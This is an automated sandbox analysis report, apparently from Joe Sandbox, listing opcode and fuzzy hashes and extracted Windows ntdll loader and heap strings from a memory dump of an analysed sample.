                                • Instruction ID: d77fd4eb2d43b743ef2a8ce176eb722d71ac0023582c689684abf198f92a7ad9
                                • Opcode Fuzzy Hash: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
                                • Instruction Fuzzy Hash: EAA15B719112299BDF39DF28CC88BEAB7B8EF48704F1041E9E958A7250D7359E84CF90
                                Strings
                                • LdrpCheckModule, xrefs: 011AA117
                                • minkernel\ntdll\ldrinit.c, xrefs: 011AA121
                                • Failed to allocated memory for shimmed module list, xrefs: 011AA10F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-161242083
                                • Opcode ID: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
                                • Instruction ID: f76b9eec6cfdab87bb681e555d9102d476372708040891c6b5e54b458ab83c50
                                • Opcode Fuzzy Hash: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
                                • Instruction Fuzzy Hash: 5571F074A00205EFDB2DDF68D984ABEBBF8FF48204F04446DE8029B245E735AE51CB41
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-1334570610
                                • Opcode ID: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
                                • Instruction ID: 9abeb2f69266cfedd0ff905cfeaf06d1a2ddb08d38932febca4b63b87dcfe92e
                                • Opcode Fuzzy Hash: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
                                • Instruction Fuzzy Hash: 6F61BE74604301DFDB6DCF68C480B6ABBE2FF89704F158559F8698B296D770E881CB91
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 011B82E8
                                • LdrpInitializePerUserWindowsDirectory, xrefs: 011B82DE
                                • Failed to reallocate the system dirs string !, xrefs: 011B82D7
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1783798831
                                • Opcode ID: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
                                • Instruction ID: 6c86270ae5ee9d3f86b4c527d954710f4a0e77c5d4d58d8ad292368f539f0ffd
                                • Opcode Fuzzy Hash: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
                                • Instruction Fuzzy Hash: 7F411372554702EBD729EB68E845B9BBBECEF45B54F00492AF948D3250EB74D800CBD2
                                Strings
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011FC1C5
                                • PreferredUILanguages, xrefs: 011FC212
                                • @, xrefs: 011FC1F1
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                • API String ID: 0-2968386058
                                • Opcode ID: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
                                • Instruction ID: 1b5f7670c602cd51c03118da4efbf69a393beeecf37a323bf6611c07a0b27842
                                • Opcode Fuzzy Hash: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
                                • Instruction Fuzzy Hash: CC418275E0020DEBDF19DAD8C841FEEBBB9EB14704F04406EEA19B7240D7749A44DB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                • API String ID: 0-1373925480
                                • Opcode ID: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
                                • Instruction ID: 39642bdc511ba74952db17cdd63eb146c0cb36bf1c94abc2f11b4139368fc543
                                • Opcode Fuzzy Hash: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
                                • Instruction Fuzzy Hash: F2414232A00259CBEB2EDBE8D840BADBBB8FF65384F15045AD911EBF81D7349901CB11
                                Strings
                                • LdrpCheckRedirection, xrefs: 011C488F
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011C4888
                                • minkernel\ntdll\ldrredirect.c, xrefs: 011C4899
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-3154609507
                                • Opcode ID: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                • Instruction ID: a7e9643994b699b211b00d367b4f4a4e838b3e0acebd5f5047f3816bccf18cd0
                                • Opcode Fuzzy Hash: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                • Instruction Fuzzy Hash: 5C41D432A187519FCB29CF9CD860A27BBE4EF69E50B06056DED88D7B55D730D800CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-2558761708
                                • Opcode ID: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
                                • Instruction ID: e360334c51eedad71632eccae24a0154cdb627cd8a4b96f352c62915159d3817
                                • Opcode Fuzzy Hash: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
                                • Instruction Fuzzy Hash: 58113335318102DFDBADCA18C485B7ABBA6EF84719F1A812DF816CB256FB30D840C756
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 011C2104
                                • Process initialization failed with status 0x%08lx, xrefs: 011C20F3
                                • LdrpInitializationFailure, xrefs: 011C20FA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2986994758
                                • Opcode ID: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
                                • Instruction ID: 3c75daf45dacef739d0c8241d7179115152aea7824a12b9b78a82ef9f3d4236f
                                • Opcode Fuzzy Hash: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
                                • Instruction Fuzzy Hash: C5F0C235640319BBE72CEA4DEC46F993BA8EB91F58F50006DF60077685E7F0AA10CA91
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: #%u
                                • API String ID: 48624451-232158463
                                • Opcode ID: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
                                • Instruction ID: b65694c337e1020fb1abddb8a4a86f7de66f72dafbc82d03a73564ba8b1410b5
                                • Opcode Fuzzy Hash: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
                                • Instruction Fuzzy Hash: F2716871A0014ADFDB09DFA8C980BAEBBF8FF18744F154065E915A7251EB74EE01CBA1
                                Strings
                                • LdrResSearchResource Enter, xrefs: 0114AA13
                                • LdrResSearchResource Exit, xrefs: 0114AA25
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                • API String ID: 0-4066393604
                                • Opcode ID: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
                                • Instruction ID: a2b7e1f9c075e317a956f4714a7b8a6890b0f95e9e808bb7d2be95d327b7eedc
                                • Opcode Fuzzy Hash: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
                                • Instruction Fuzzy Hash: AEE19275E802199FEB2ECF98D980BAEBBB9FF44714F12442AE912E7241D734D940CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: `$`
                                • API String ID: 0-197956300
                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction ID: 8153e0d8ccbb18374daa44082ce70e6e703f8587164450e409832b8e842f8dc4
                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction Fuzzy Hash: 2CC1AF312243429BEB26CF28C841B6BBBE5AFD4318F444B2CF6968B2D2D775D545CB41
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Legacy$UEFI
                                • API String ID: 2994545307-634100481
                                • Opcode ID: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
                                • Instruction ID: a04e6c79fa9642a78be1bc00ef6fb41e208c568cb2ae0db8015a8524967dbc60
                                • Opcode Fuzzy Hash: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
                                • Instruction Fuzzy Hash: AE616C72E017199FDB19DFA8C880BEEBBB5FB48704F14816DE659EB251E731A900CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$MUI
                                • API String ID: 0-17815947
                                • Opcode ID: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
                                • Instruction ID: 886b341f51b85c4e9acc004d3401a172fcb57185c4733281f7f1c856b5b66442
                                • Opcode Fuzzy Hash: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
                                • Instruction Fuzzy Hash: 64511771E0061EAFDB15DFE9CC84AEEBBF8AF44758F104529E611E7690D7309A05CB60
                                Strings
                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0114063D
                                • kLsE, xrefs: 01140540
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                • API String ID: 0-2547482624
                                • Opcode ID: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
                                • Instruction ID: 96a328b92cc69fc84b28c29e61d0262897ae6f7f43575d1bc2a6d5b55f0bb63a
                                • Opcode Fuzzy Hash: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
                                • Instruction Fuzzy Hash: 6951BF715047429BD728DF6AC4406E7B7E8AF88B04F10483EE6EA87241E770D545CF92
                                Strings
                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0114A2FB
                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0114A309
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                • API String ID: 0-2876891731
                                • Opcode ID: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
                                • Instruction ID: fe1f20fbdea1b6b75f49521ae85809c642b38f98055dce5152bf45d7fb8127ba
                                • Opcode Fuzzy Hash: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
                                • Instruction Fuzzy Hash: D5411235A48245CFDB2DCF69D840B6EBBB4FF85B04F1640A9E912DB291E3B5D900CB41
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Cleanup Group$Threadpool!
                                • API String ID: 2994545307-4008356553
                                • Opcode ID: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
                                • Instruction ID: 34f019aa1f939aa9d47f53e321486063081712640a95c1538678e8555e6287df
                                • Opcode Fuzzy Hash: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
                                • Instruction Fuzzy Hash: 3901F4B2240704AFD316DF14DD49F1A77F9EB85719F058939B648C7694E334D904CB46
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: MUI
                                • API String ID: 0-1339004836
                                • Opcode ID: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
                                • Instruction ID: 5436cd21b720be1c8405fe21bc9845280ed6e4ef9b34b16a819e4b48c5a0daf1
                                • Opcode Fuzzy Hash: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
                                • Instruction Fuzzy Hash: F1827B75E012198FEF29CFA9D880BEDBBB1BF48B50F14816AD919AB350D7309941CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
                                • Instruction ID: f9978d007d2b5c0eb0f0b2e234a47672d9f88a8f5baa15d15374716e6f6bb13b
                                • Opcode Fuzzy Hash: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
                                • Instruction Fuzzy Hash: C9918372900219AFEB29DF95CC85FAEBBB8EF24B54F104019F601AB291D775ED00CB60
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: d349a47b6618f0412a4d38469f93c30b50031ea23b4319a7b46eb5979ecee4e6
                                • Instruction ID: e5fa7f23eba8f10e0e99789d2344ac01456f9244d0cb0ba8d9bb6b95c2354b2e
                                • Opcode Fuzzy Hash: d349a47b6618f0412a4d38469f93c30b50031ea23b4319a7b46eb5979ecee4e6
                                • Instruction Fuzzy Hash: E991AF31902A0AAFDB2AAFE5DC48FEFBBB9EF45744F140029F511A7250EB749901CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalTags
                                • API String ID: 0-1106856819
                                • Opcode ID: 3774ceaa6699ef9f5a7729dfd8e00ace83fef413da378d9b4ff4d6b15a5ec178
                                • Instruction ID: 87ccc432c79965ae32832d52ed0fb4e3b05abf3e2d9e618486562aaf2e5711c1
                                • Opcode Fuzzy Hash: 3774ceaa6699ef9f5a7729dfd8e00ace83fef413da378d9b4ff4d6b15a5ec178
                                • Instruction Fuzzy Hash: FD7159B5E0021A9FDF2CCF98D590AEDBBB2BF68704F14812EE905A7245E7319941CB60
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: .mui
                                • API String ID: 0-1199573805
                                • Opcode ID: 78272a99e533309f557ffc028168149f88ced713940c7abc3ee32da852cd9f86
                                • Instruction ID: 48c3ae51b3ccf9ad0d7d7c9f1317d5671d346dd789bde121ddb39691cc54e30b
                                • Opcode Fuzzy Hash: 78272a99e533309f557ffc028168149f88ced713940c7abc3ee32da852cd9f86
                                • Instruction Fuzzy Hash: 69519372D0062ADBDF18DFD9D848AAEBBF5AF44A54F054129EA11FB740D3349801CBE4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: EXT-
                                • API String ID: 0-1948896318
                                • Opcode ID: a0309d4b64497eeaaf4453a322771887751392264524ab635f9226b6c6a2b83d
                                • Instruction ID: 9697d6f22be901a6bbf987fab01bc0f60b38458ff2ab0225406f80c40ce7115e
                                • Opcode Fuzzy Hash: a0309d4b64497eeaaf4453a322771887751392264524ab635f9226b6c6a2b83d
                                • Instruction Fuzzy Hash: E441A072909702DBD759DA75C840B6BFBE8AF88708F44092DFAA4D7180E774DA04C797
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: BinaryHash
                                • API String ID: 0-2202222882
                                • Opcode ID: 9b39677631f8e4c4dabb57607abae41739060df1df40877c19c18bf2d98fa2ae
                                • Instruction ID: 484925d1c1e349b25de99d87d96408bda28f9cc3fb3b3e7da3dcba79c58b74fb
                                • Opcode Fuzzy Hash: 9b39677631f8e4c4dabb57607abae41739060df1df40877c19c18bf2d98fa2ae
                                • Instruction Fuzzy Hash: E24142B1D0012DABDB25DA50CC84FDEB77CAB54718F0085A5EA08AB140DB709E89CFE4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: #
                                • API String ID: 0-1885708031
                                • Opcode ID: 3511d574ca01bf236e94dc9099eeb40b4009826d3f148836e01627e95c94ee35
                                • Instruction ID: 43cb6b691c3c945b893a3d976ad1a9033693a8d4f5208b462af992e5b3d4b86f
                                • Opcode Fuzzy Hash: 3511d574ca01bf236e94dc9099eeb40b4009826d3f148836e01627e95c94ee35
                                • Instruction Fuzzy Hash: D6314831A00719DBEB3ADF69C854BEEBBB8DF05708F144028E954AB282DB75E905CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: BinaryName
                                • API String ID: 0-215506332
                                • Opcode ID: 085f2c4dfca75ca1135c08c1098e7c7251859b08a890fd42217c215e3855273b
                                • Instruction ID: 5a127b7385a6ec33458f3095f3c5e6fb8bfec8bd0883d37686e4158fa94d8525
                                • Opcode Fuzzy Hash: 085f2c4dfca75ca1135c08c1098e7c7251859b08a890fd42217c215e3855273b
                                • Instruction Fuzzy Hash: BB312736900515AFEB1EDB59C991FEFBB75EF80790F018129E911A7250D7309E00DBE0
                                Strings
                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011C895E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                • API String ID: 0-702105204
                                • Opcode ID: 285bf74a33caee6b3c574b491d8c606354a9363396c4c8faf279b1db7f14fa74
                                • Instruction ID: 1cdc7844f0a2b57ea4b9a82eac14244e49cbff512b5540cdade51e68729743c5
                                • Opcode Fuzzy Hash: 285bf74a33caee6b3c574b491d8c606354a9363396c4c8faf279b1db7f14fa74
                                • Instruction Fuzzy Hash: 79017B723102029BEA2C5B19DCC9ADABB64EFE1F58B04001CF64506111EB20AC80C796
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df5e01f792355697a5a1e38638e39bbe221e1899bc6c89823f7e3f1054034ecf
                                • Instruction ID: ab5e46e463705a0c715ab2fce9e3354398f4b3c7626004cf3d11de3c143ad320
                                • Opcode Fuzzy Hash: df5e01f792355697a5a1e38638e39bbe221e1899bc6c89823f7e3f1054034ecf
                                • Instruction Fuzzy Hash: E342EA71608B418FD71DCFA8C8A4A6FBBE9BF98304F08492DFA9287250D771D945CB52
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eef2af494280b41d9264449d62789a676db9bba8a681b5bc916fc8c9750ff451
                                • Instruction ID: e2ae22fdfff4bf82523f4b0112eecbde59c81565e11a0f339141fb1e159ac2fc
                                • Opcode Fuzzy Hash: eef2af494280b41d9264449d62789a676db9bba8a681b5bc916fc8c9750ff451
                                • Instruction Fuzzy Hash: 6A426D71E102199FEB28CF69C881BADBBF5BF88314F158199E94DEB241DB349981CF50
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 86a29e5569f9836ca2770bba8cb50b49d1a35e2ab9b8f573d2020aa60433cddb
                                • Instruction ID: ab8cde032b8adf773641651fd3dcc6c70fdc7a9b3c173efb42a4ff9c5d369672
                                • Opcode Fuzzy Hash: 86a29e5569f9836ca2770bba8cb50b49d1a35e2ab9b8f573d2020aa60433cddb
                                • Instruction Fuzzy Hash: A132BA78A00755CBEB2DCF69C8447BABFF2AF84304F68411DD59A9B285E735A802CB51
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1273580780c0ad1ab630a0c0fb1891a3787a5ae543d73f0b828e9739ef74a11a
                                • Instruction ID: f96ef592060c57b211970c22fb25633dc31bafd6618ddfae356f1b6adcf60aec
                                • Opcode Fuzzy Hash: 1273580780c0ad1ab630a0c0fb1891a3787a5ae543d73f0b828e9739ef74a11a
                                • Instruction Fuzzy Hash: CE22E374604E618BEB2DCFADE098372BBF1AF45300F098459E9978F286D335E452CB61
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d42b2afb9699ab6a546269c26bae9949349385529d3ed8ea3f559f58c0eca4e9
                                • Instruction ID: 75b1f20cddec72d78baadf2d8ea83bb5fe698bb7ac50654402f851972354dec1
                                • Opcode Fuzzy Hash: d42b2afb9699ab6a546269c26bae9949349385529d3ed8ea3f559f58c0eca4e9
                                • Instruction Fuzzy Hash: AF32FF74A00205DFDB29CF68C480BAEBBF1FF49714F24856AE956AB391D730E841CB91
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                • Instruction ID: 221f72400c901743739e1a72864e9cd66ce2e2af04ccc9b0d00bd8baacfc3a65
                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                • Instruction Fuzzy Hash: 79F1AF74E0020A9BDB1DCF99C480BAEBBF9BF58714F098129E905EB744E735D851CB60
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1df200ed10e87b995b99cbc872f52ea1af5ed628ffe736133c3ec8384f9b823a
                                • Instruction ID: 6fbf219e17ada2064a0ec9e79ceb89227826d1cbca68941f284861f6d5b3f9f6
                                • Opcode Fuzzy Hash: 1df200ed10e87b995b99cbc872f52ea1af5ed628ffe736133c3ec8384f9b823a
